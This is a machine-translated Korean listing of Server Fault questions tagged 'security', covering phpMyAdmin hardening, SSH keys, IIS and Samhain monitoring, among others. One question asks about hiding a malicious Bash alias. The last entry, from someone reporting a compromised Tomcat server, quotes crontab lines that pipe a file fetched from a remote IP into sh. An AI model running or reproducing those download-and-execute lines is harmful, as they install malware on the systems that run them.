«security» 태그된 질문

나는 아파치 로그를 확인했으며 whooooaaa에는 phpmyadmin을 악용하려는 많은 봇이 있습니다. 내가 한 첫 번째 일은 디렉토리 이름을 더 모호한 것으로 변경하는 것이 었습니다. 그러나 phpmyadmin을 보호하기위한 다른 팁이 있습니까? (데이터베이스 자체는 로컬 네트워크에서만 사용 가능합니다)

9 apache-2.2  security 

Linux 시스템에서 Bash에 악성 별칭이 있음을 숨기고 사용자가 모르게 실행할 수 있습니까?

9 linux  security  bash  alias  malware 

새로운 보안 서버 를 설정하는 방법에 대한 많은 자습서가 있습니다 . 그러나 다른 사람이 얼마 전에 설정 한 서버를 관리해야하는데 아직 그 구성에 대해 잘 모르는 경우 어떻게해야합니까? "일반적인 용의자"를 자동으로 검사하는 도구 나 확실한 보안 허점이 없는지 확인하기위한 검사 목록이 있습니까? 취약점을 원격으로 확인하는 웹 서비스가 있습니까?

9 linux  security 

SQL Server 2008 Management Studio를 사용하고 있습니다. 현재 로그온 계정은 컴퓨터 로컬 관리자 그룹에 속합니다. SQL Server 2008에서 Windows 통합 보안 모드를 사용하고 있습니다. 내 문제는 SQL Server Management Studio에 로그인 한 후 보안 / 로그인에서 로그인 이름을 선택한 다음 서버 역할 탭을 선택한 다음 마지막 항목을 선택합니다-sysadmin이 자신을이 그룹 …

9 sql-server  security  sql-server-2008 

애플리케이션에서 원격 서버로 파일을 전송하고 있으며 필요한 인증 방법은 SSH 키를 사용하는 것입니다. 그래서 ssh-keygen을 사용하여 키 페어를 만들고 원격 호스트의 authorized_keys 파일에 삽입하기 위해 공개 키를 제출했습니다. 그러나 IT 보안 팀은이를 위해 키 쌍을 생성하고 개인 키를 보내겠다고 거부했습니다. 이유 : "IT 보안 팀이 서명 할 SSH 키가 필요합니다. …

9 security  ssh 

닫은. 이 질문은 주제에 맞지 않습니다 . 현재 답변을받지 않습니다. 이 질문을 개선하고 싶습니까? 서버 결함에 대한 주제가 되도록 질문을 업데이트하십시오 . 휴일 3 년 전 . Windows 환경에서 서비스 계정의 다음 문제를 어떻게 해결합니까? 정기적 인 비밀번호 변경-여러 컴퓨터에서 사용되는 단일 서비스 계정을 통해 상당한 중단 기간없이 정기적으로 비밀번호를 …

9 windows  security  active-directory  password 

보안 감사의 결과 랙을 잠그고 키를 관리해야합니다. 키를 안전하게 유지 기록 키 사용법 이 두 가지 요구 사항을 준수하는 것은 서버 룸에 액세스해야하는 가능한 sysadmin 및 netadmin (약 10 명)이 많기 때문에 많은 문제가 있습니다. 우리는 몇 가지 가능한 솔루션을 고려하고 있지만 모든 사람은 주요 마스터가 누구인지, 그리고 그러한 사람이 …

9 security  rack  keys 

현재로서는이 질문이 Q & A 형식에 적합하지 않습니다. 답변, 사실, 참고 자료 또는 전문 지식을 통해 답변이 뒷받침 될 것으로 예상되지만이 질문은 토론, 논쟁, 여론 조사 또는 광범위한 토론을 요구할 것입니다. 이 질문을 개선하고 다시 열 수 있다고 생각 되면 도움말 센터 를 방문하여 안내를 받으십시오 . 휴일 칠년 전에 …

9 security 

내 homedir 아래에 ".gvfs"라는 디렉토리가 있습니다. 내 일반 사용자 계정으로 잘 읽을 수 있습니다. ~ $ ls -lart ~raldi/.gvfs total 4 dr-x------ 2 raldi raldi 0 2009-05-25 22:17 . drwxr-xr-x 60 raldi raldi 4096 2009-05-25 23:08 .. ~ $ ls -d ~raldi/.gvfs dr-x------ 2 raldi raldi 0 2009-05-25 22:17 /home/raldi/.gvfs …

9 linux  security  unix  permissions  filesystems 

닫은. 이 질문은 주제에 맞지 않습니다 . 현재 답변을받지 않습니다. 휴일 팔년 전에 . 잠김 . 이 질문과 주제는 주제가 다르지만 역사적으로 중요하기 때문에이 질문과 답변은 잠겨 있습니다. 현재 새로운 답변이나 상호 작용을받지 않습니다. 회사 방화벽이 첨부 파일을 제거했음을 알기 위해 고객에게 이메일 zip 파일을 제공하는 경우가 종종 있습니다. 전자 …

9 security  email  firewall  compression 

IIS 서버 중 하나 (IIS 7.5, Server 2008 R2)는 간단한 파일 이름 공개 문제에 대해 "취약성"인 것 같습니다 . 그러나 실제로 문제를 해결하는 데 어려움을 겪고 있습니다. 지금까지 8.3 파일 이름 비활성화, 웹 서버 중지, 사이트 디렉토리 재 작성 및 서비스 다시 시작 URL에 물결표에 대한 필터 규칙을 추가했습니다. 물결표에 …

9 security  iis 

limits.conf의 항목에 대한 세부 정보를 제공하는 사람이 설명하거나 소스를 알고 있습니까? 매뉴얼 페이지에는 자세한 내용이 나와 있지 않습니다. 예를 들면 다음과 같습니다. rtprio maximum realtime priority allowed for non-privileged processes (Linux 2.6.12 and higher) priority the priority to run user process with (negative values boost process priority) 이것들은 어떻게 다릅니 …

9 linux  security  limits 

예를 들어 Samhain이 파일을 모니터링하고 싶습니다 /root/somefile. 이 파일은 현재 존재하지 않지만 언제라도 생성되면 알림을 받고 싶습니다. 나는 이것을 다음에 추가한다 samhainrc: [ReadOnly] file = /root/somefile 이로 인해 Samhain은 다음과 같은 로그 항목을 생성합니다. Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: CRIT : [2018-10-18T22:54:04+0000] interface=<lstat>, msg=<No such file or directory>, userid=<0>, path=</root/somefile> …

8 linux  security  intrusion-detection 

약 200 명의 사용자가 있습니다. 아시아에 50 명, 남유럽과 동유럽에 50 명, 서유럽에 약 100 명이 있습니다. 아시아에있는 50 명의 사용자가 아시아의 DC를 가리 키도록하고 싶습니다. 현재 유럽 서버에 인증을 받고있는 것으로 나타났습니다. 이 문제의 원인 또는 문제를 해결할 수있는 원인은 무엇입니까?

8 windows  windows-server-2008  active-directory  security 

Apache Tomcat 서버에서 프로젝트 전쟁을 실행하는 동안 서버가 손상되었음을 알았습니다. 알 수없는 전쟁을 실행하는 동안 cron다음과 같이 실행 [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh 다운로드 된이 logo.jpg악성 코드를 다운로드하는 쉘 스크립트를 가지고있다. 아래 …

8 linux  shell  security  tomcat